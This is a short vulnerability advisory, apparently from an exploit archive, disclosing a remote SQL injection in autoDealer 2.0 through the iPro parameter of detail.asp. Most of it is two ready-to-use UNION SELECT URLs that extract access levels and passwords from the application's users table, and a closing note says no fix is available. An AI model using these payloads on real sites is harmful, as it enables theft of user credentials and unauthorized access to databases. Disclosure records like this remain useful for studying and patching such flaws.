autoDealer <= 2.0 (detail.asp iPro) Remote SQL Injection Vulnerability

2007-01-01 00:00:00

*******************************************************************************
# Title : autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.aspsiteware.com
# $$ : $60.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//detail.asp?iPro=[SQL]

Example:

//detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
//detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.